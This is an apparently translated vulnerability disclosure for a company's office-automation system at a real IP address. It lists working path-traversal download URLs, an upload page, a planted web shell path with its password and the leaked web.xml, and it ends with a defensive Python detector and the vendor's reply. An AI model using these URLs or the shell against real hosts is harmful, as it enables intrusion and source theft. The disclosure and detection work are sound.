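2015-10-22: Details reported to the vendor; awaiting vendor handling
2015-10-23: Vendor confirmed; details disclosed to the vendor only
2015-11-02: Details disclosed to core white hats and experts in related fields
2015-11-12: Details disclosed to regular white hats
2015-11-22: Details disclosed to intern white hats
2015-12-07: Details disclosed to the public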
Got in once again~
OA system upload address:
1. http://183.62.40.31/defaultroot/work_flow/formStartJSPUpload.jsp
OA system download addresses:
1. http://183.62.40.31/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x
2. http://183.62.40.31/defaultroot/information_manager/informationmanager_download.jsp?path=..&FileName=WEB-INF/web.xml&name=x
Shell address: http://183.62.40.31/defaultroot/work_flow/mkzy.jsp heroes
The file download retrieved web.xml; the source code of the entire site could be downloaded the same way.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
  <display-name>defaultroot</display-name>
  <context-param> <param-name>weblogic.httpd.inputCharset./*</param-name> <param-value>UTF-8</param-value> </context-param>
  <filter>
    <filter-name>Set Character Encoding</filter-name>
    <filter-class>com.whir.common.util.SetCharacterEncodingFilter</filter-class>
    <init-param> <param-name>encoding</param-name> <param-value>UTF-8</param-value> </init-param>
    <init-param> <param-name>ignore</param-name> <param-value>true</param-value> </init-param>
  </filter>
  <!-- cas sso filter start -->
  <filter>
    <filter-name>CAS_Validation_Filter</filter-name>
    <filter-class>org.jasig.cas.client.validation.Cas20ProxyReceivingTicketValidationFilter</filter-class>
    <init-param> <param-name>casServerUrlPrefix</param-name> <param-value>https://uim.infinitus.com.cn</param-value> </init-param>
    <init-param> <!-- locale cas check address --> <param-name>service</param-name> <param-value>http://oa.infinitus.com.cn/defaultroot/SSOLoginAction.do</param-value> </init-param>
    <init-param> <param-name>redirectAfterValidation</param-name> <param-value>false</param-value> </init-param>
  </filter>
  <filter-mapping> <filter-name>CAS_Validation_Filter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping>
  <!-- cas sso filter end -->
  <filter-mapping> <filter-name>Set Character Encoding</filter-name> <servlet-name>action</servlet-name> </filter-mapping>
  <listener> <listener-class>com.whir.ezoffice.online.SystemListener</listener-class> </listener>
  <servlet>
    <servlet-name>action</servlet-name>
    <servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
    <init-param>
      <param-name>config</param-name>
      <param-value>
        /WEB-INF/struts-config/archives-config.xml,
        /WEB-INF/struts-config/struts-config.xml,
        /WEB-INF/struts-config.xml,
        /WEB-INF/struts-config/organization-config.xml,
        /WEB-INF/struts-config/event-config.xml,
        /WEB-INF/struts-config/basedata-config.xml,
        /WEB-INF/struts-config/manager-config.xml,
        /WEB-INF/struts-config/group-config.xml,
        /WEB-INF/struts-config/user-config.xml,
        /WEB-INF/struts-config/right-config.xml,
        /WEB-INF/struts-config/role-config.xml,
        /WEB-INF/struts-config/security-config.xml,
        /WEB-INF/struts-config/forum-config.xml,
        /WEB-INF/struts-config/mailsetup-config.xml,
        /WEB-INF/struts-config/information-config.xml,
        /WEB-INF/struts-config/redhead-config.xml,
        /WEB-INF/struts-config/workflow-config.xml,
        /WEB-INF/struts-config/innermail-config.xml,
        /WEB-INF/struts-config/personalwork-config.xml,
        /WEB-INF/struts-config/subsidiarywork-config.xml,
        /WEB-INF/struts-config/workmanager-config.xml,
        /WEB-INF/struts-config/task-config.xml,
        /WEB-INF/struts-config/worklog-config.xml,
        /WEB-INF/struts-config/officemanager-config.xml,
        /WEB-INF/struts-config/menu-config.xml,
        /WEB-INF/struts-config/resource-config.xml,
        /WEB-INF/struts-config/systemnumber-config.xml,
        /WEB-INF/struts-config/booksmanager-config.xml,
        /WEB-INF/struts-config/voiture-config.xml,
        /WEB-INF/struts-config/boardroom-config.xml,
        /WEB-INF/struts-config/equipment-config.xml,
        /WEB-INF/struts-config/foregroundres-config.xml,
        /WEB-INF/struts-config/mobilemsg-config.xml,
        /WEB-INF/struts-config/govdocumentmanager-config.xml,
        /WEB-INF/struts-config/message-config.xml,
        /WEB-INF/struts-config/custom-config.xml,
        /WEB-INF/struts-config/customForm-config.xml,
        /WEB-INF/struts-config/customize-config.xml,
        /WEB-INF/struts-config/sitemanager-config.xml,
        /WEB-INF/struts-config/netdisk-config.xml,
        /WEB-INF/struts-config/aep-config.xml,
        /WEB-INF/struts-config/namecard-config.xml,
        /WEB-INF/struts-config/examination-config.xml,
        /WEB-INF/struts-config/press_config.xml,
        /WEB-INF/struts-config/dossier-config.xml,
        /WEB-INF/struts-config/projectmanager-config.xml,
        /WEB-INF/struts-config/govexchange-config.xml,
        /WEB-INF/struts-config/customizeCenter-config.xml,
        /WEB-INF/struts-config/workflowAnalysis-config.xml,
        /WEB-INF/struts-config/ldap-config.xml,
        /WEB-INF/struts-config/extension-config.xml,
        /WEB-INF/struts-config/wage-config.xml,
        /WEB-INF/struts-config/assessment-config.xml,
        /WEB-INF/struts-config/assunittest-config.xml,
        /WEB-INF/struts-config/performanceManager-config.xml,
        /WEB-INF/struts-config/hrm-config.xml,
        /WEB-INF/struts-config/systemremind-config.xml,
        /WEB-INF/struts-config/customdesktop-config.xml,
        /WEB-INF/struts-config/contract-config.xml,
        /WEB-INF/struts-config/hrm-kq-config.xml,
        /WEB-INF/struts-config/assetManager-config.xml,
        /WEB-INF/struts-config/Fax-config.xml,
        /WEB-INF/struts-config/ljj_transfer-config.xml,
        /WEB-INF/struts-config/ssologin-config.xml,
        /WEB-INF/struts-config/ljj_empshop-config.xml,
        /WEB-INF/struts-config/ljj_wenju-config.xml
      </param-value>
    </init-param>
    <init-param> <param-name>debug</param-name> <param-value>2</param-value> </init-param>
    <init-param> <param-name>convertNull</param-name> <param-value>true</param-value> </init-param>
    <init-param> <param-name>application</param-name> <param-value>ApplicationResources</param-value> </init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
  <!-- <listener> <listener-class>com.whir.common.init.StartupServlet</listener-class> </listener>-->
  <servlet>
    <servlet-name>StartupServlet</servlet-name>
    <display-name>StartupServlet</display-name>
    <servlet-class>com.whir.common.init.StartupServlet</servlet-class>
    <load-on-startup>0</load-on-startup>
  </servlet>
  <servlet>
    <servlet-name>dwr-invoker</servlet-name>
    <display-name>DWR Servlet</display-name>
    <description>Direct Web Remoter Servlet</description>
    <servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class>
    <init-param> <param-name>debug</param-name> <param-value>true</param-value> </init-param>
    <init-param> <param-name>config-custmize</param-name> <param-value>/WEB-INF/dwr.xml</param-value> </init-param>
  </servlet>
  <servlet>
    <servlet-name>dwr-webform</servlet-name>
    <display-name>DWR Servlet</display-name>
    <description>Direct Web Remoter Servlet</description>
    <servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class>
    <init-param> <param-name>debug</param-name> <param-value>true</param-value> </init-param>
    <init-param> <param-name>config-webform</param-name> <param-value>/WEB-INF/form.xml</param-value> </init-param>
  </servlet>
  <servlet>
    <servlet-name>dwr-workflow</servlet-name>
    <display-name>DWR Servlet</display-name>
    <description>Direct Web Remoter Servlet</description>
    <servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class>
    <init-param> <param-name>debug</param-name> <param-value>true</param-value> </init-param>
    <init-param> <param-name>config-webform</param-name> <param-value>/WEB-INF/dwr_workflow.xml</param-value> </init-param>
  </servlet>
  <servlet>
    <servlet-name>GetRawFile</servlet-name>
    <servlet-class>com.whir.ezoffice.customdesktop.action.GetRawFile</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>CustomDesktopAction</servlet-name>
    <servlet-class>com.whir.ezoffice.customdesktop.action.CustomDesktopAction</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>TestChart</servlet-name>
    <servlet-class> com.whir.site.system.TestChart</servlet-class>
  </servlet>
  <servlet>
    <servlet-name> QuartzInitializer </servlet-name>
    <display-name> Quartz Initializer Servlet </display-name>
    <servlet-class> org.quartz.ee.servlet.QuartzInitializerServlet </servlet-class>
    <init-param> <param-name>config-file</param-name> <param-value>/quartz.properties</param-value> </init-param>
    <init-param> <param-name>shutdown-on-unload</param-name> <param-value>true</param-value> </init-param>
    <load-on-startup>2</load-on-startup>
  </servlet>
  <servlet>
    <servlet-name>ReportServlet</servlet-name>
    <display-name>ReportServlet</display-name>
    <description>ReportServlet</description>
    <servlet-class>com.whir.govezoffice.report.ReportServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>RegistryService</servlet-name>
    <servlet-class>com.whir.component.extds.RegistryService</servlet-class>
    <load-on-startup>3</load-on-startup>
  </servlet>
  <servlet>
    <servlet-name>DisplayChart</servlet-name>
    <servlet-class>org.jfree.chart.servlet.DisplayChart</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>SOAPMonitorService</servlet-name>
    <display-name>SOAP Monitor Service</display-name>
    <servlet-class>org.apache.axis.monitor.SOAPMonitorService</servlet-class>
    <init-param> <param-name>SOAPMonitorPort</param-name> <param-value>5001</param-value> </init-param>
    <load-on-startup>100</load-on-startup>
  </servlet>
  <servlet>
    <servlet-name>AdminServlet</servlet-name>
    <display-name>Axis Admin Servlet</display-name>
    <servlet-class>org.apache.axis.transport.http.AdminServlet</servlet-class>
    <load-on-startup>100</load-on-startup>
  </servlet>
  <servlet>
    <servlet-name>AxisServlet</servlet-name>
    <display-name>Apache-Axis Servlet</display-name>
    <servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>XFireServlet</servlet-name>
    <display-name>XFire Servlet</display-name>
    <servlet-class>org.codehaus.xfire.transport.http.XFireConfigurableServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>iWebRevisionServlet</servlet-name>
    <servlet-class>com.whir.integration.goldgrid.IWebRevisionServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>officeserverservlet</servlet-name>
    <servlet-class>com.whir.integration.goldgrid.OfficeServerServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>DepartmentServletAction</servlet-name>
    <servlet-class>com.whir.ezoffice.information.channelmanager.action.DepartmentServletAction</servlet-class>
  </servlet>
  <servlet> <servlet-name>WebBill</servlet-name> <servlet-class>WebBill</servlet-class> </servlet>
  <servlet> <servlet-name>PathFile</servlet-name> <servlet-class>PathFile</servlet-class> </servlet>
  <servlet> <servlet-name>RunReport</servlet-name> <servlet-class>RunReport</servlet-class> </servlet>
  <servlet> <servlet-name>ebfile</servlet-name> <servlet-class>ebfile</servlet-class> </servlet>
  <servlet-mapping> <servlet-name>WebBill</servlet-name> <url-pattern>/servlet/WebBill</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>PathFile</servlet-name> <url-pattern>/servlet/PathFile</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>RunReport</servlet-name> <url-pattern>/servlet/RunReport</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>ebfile</servlet-name> <url-pattern>/servlet/ebfile</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>officeserverservlet</servlet-name> <url-pattern>/officeserverservlet</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>iWebRevisionServlet</servlet-name> <url-pattern>/iWebRevisionServlet</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>DepartmentServletAction</servlet-name> <url-pattern>/DepartmentServletAction</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>DisplayChart</servlet-name> <url-pattern>/DisplayChart</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>ReportServlet</servlet-name> <url-pattern>/ReportServlet</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>action</servlet-name> <url-pattern>*.do</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>StartupServlet</servlet-name> <url-pattern>/StartupServlet</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>dwr-invoker</servlet-name> <url-pattern>/customize/dwr/*</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>dwr-webform</servlet-name> <url-pattern>/webform/dwr/*</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>dwr-workflow</servlet-name> <url-pattern>/workflow/dwr/*</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>GetRawFile</servlet-name> <url-pattern>/GetRawFile</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>CustomDesktopAction</servlet-name> <url-pattern>/CustomDesktopAction</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>TestChart</servlet-name> <url-pattern>/servlet/TestChart</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>SOAPMonitorService</servlet-name> <url-pattern>/SOAPMonitor</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>AdminServlet</servlet-name> <url-pattern>/servlet/AdminServlet</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>AxisServlet</servlet-name> <url-pattern>/servlet/AxisServlet</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>AxisServlet</servlet-name> <url-pattern>*.jws</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>AxisServlet</servlet-name> <url-pattern>/services/*</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>XFireServlet</servlet-name> <url-pattern>/xfservlet/XFireServlet/*</url-pattern> </servlet-mapping>
  <servlet-mapping> <servlet-name>XFireServlet</servlet-name> <url-pattern>/xfservices/*</url-pattern> </servlet-mapping>
  <session-config> <session-timeout>480</session-timeout> </session-config>
  <mime-mapping> <extension>wsdl</extension> <mime-type>text/xml</mime-type> </mime-mapping>
  <mime-mapping> <extension>xsd</extension> <mime-type>text/xml</mime-type> </mime-mapping>
  <mime-mapping> <extension>doc</extension> <mime-type>application/msword</mime-type> </mime-mapping>
  <mime-mapping> <extension>xls</extension> <mime-type>application/msexcel</mime-type> </mime-mapping>
  <mime-mapping> <extension>ppt</extension> <mime-type>application/powerpoint</mime-type> </mime-mapping>
  <mime-mapping> <extension>xml</extension> <mime-type>text/xml</mime-type> </mime-mapping>
  <mime-mapping> <extension>xsl</extension> <mime-type>text/xml</mime-type> </mime-mapping>
  <welcome-file-list>
    <welcome-file>login.jsp</welcome-file>
    <welcome-file>index.wml</welcome-file>
    <welcome-file>index.html</welcome-file>
    <welcome-file>index.htm</welcome-file>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>
  <error-page> <error-code>404</error-code> <location>/errorShow404.jsp</location> </error-page>
  <error-page> <exception-type>java.lang.Exception</exception-type> <location>/errorShow.jsp</location> </error-page>
  <error-page> <error-code>500</error-code> <location>/errorShow.jsp</location> </error-page>
  <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-bean.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-bean.tld</taglib-location> </taglib>
  <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-html.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-html.tld</taglib-location> </taglib>
  <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-logic.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-logic.tld</taglib-location> </taglib>
  <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-template.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-template.tld</taglib-location> </taglib>
  <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-tiles.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-tiles.tld</taglib-location> </taglib>
  <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-nested.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-nested.tld</taglib-location> </taglib>
  <taglib> <taglib-uri>/WEB-INF/tag-lib/pager-taglib.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/pager-taglib.tld</taglib-location> </taglib>
  <taglib> <taglib-uri>/WEB-INF/tag-lib/FCKeditor.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/FCKeditor.tld</taglib-location> </taglib>
</web-app>
http://oa.infinitus.com.cn/defaultroot/SSOLoginAction.do
Please patch it.
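A defender-side check for the two download endpoints in this report, as an added example that is not part of the original report or the vendor's code: it rebuilds the file path each request asks for and flags requests that leave the download directory or reach WEB-INF. The join rule (path/fileName.fileExtName), the `/base` root and the sample URIs are assumptions inferred from the URLs above.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Download endpoints named in the report -> (directory, file name, extension)
# query parameters. Joining them as dir/name.ext is an assumption inferred
# from the URLs, not taken from the application's code.
ENDPOINTS = {
    "/defaultroot/netdisk/download_netdisk.jsp": ("path", "fileName", "fileExtName"),
    "/defaultroot/information_manager/informationmanager_download.jsp": ("path", "FileName", None),
}
PROTECTED = {"WEB-INF", "META-INF"}  # never served by a download handler
BASE = "/base"                       # hypothetical download root

def requested_path(uri):
    """Rebuild the relative path a download request asks for (None if not a download)."""
    parts = urlsplit(uri)
    keys = ENDPOINTS.get(parts.path)
    if keys is None:
        return None
    query = parse_qs(parts.query)  # percent-decodes each value once
    directory, name, ext = (query.get(k, [""])[0] if k else "" for k in keys)
    if ext:
        name += "." + ext
    return "/".join(p for p in (directory, name) if p).replace("\\", "/")

def classify(uri):
    """Return 'ignore', 'ok' or 'traversal' for one request URI."""
    rel = requested_path(uri)
    if rel is None:
        return "ignore"
    resolved = posixpath.normpath(posixpath.join(BASE, rel))
    escaped = not (resolved + "/").startswith(BASE + "/")
    segments = {s.upper() for s in rel.split("/")}
    # Conservative policy: any ".." segment is flagged, even if it stays inside BASE.
    return "traversal" if escaped or ".." in segments or segments & PROTECTED else "ok"

def scan(request_uris):
    """Return the request URIs that should raise an alert."""
    return [u for u in request_uris if classify(u) == "traversal"]

SAMPLE = [  # constructed request URIs; the first two mirror the report's URLs
    "/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x",
    "/defaultroot/information_manager/informationmanager_download.jsp?path=..&FileName=WEB-INF/web.xml&name=x",
    "/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=..%2F..%2FWEB-INF%2Fweb&fileExtName=xml",
    "/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=report&fileExtName=doc&fileSaveName=x",
    "/defaultroot/login.jsp",
]
```

The same `classify` logic can run server-side before a file is opened, where the resolved path should be compared against the real download directory instead of the placeholder root.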
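Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2015-10-23 09:46
Already found internally; we have asked the business team to remediate. Thank you, white hat!
None yet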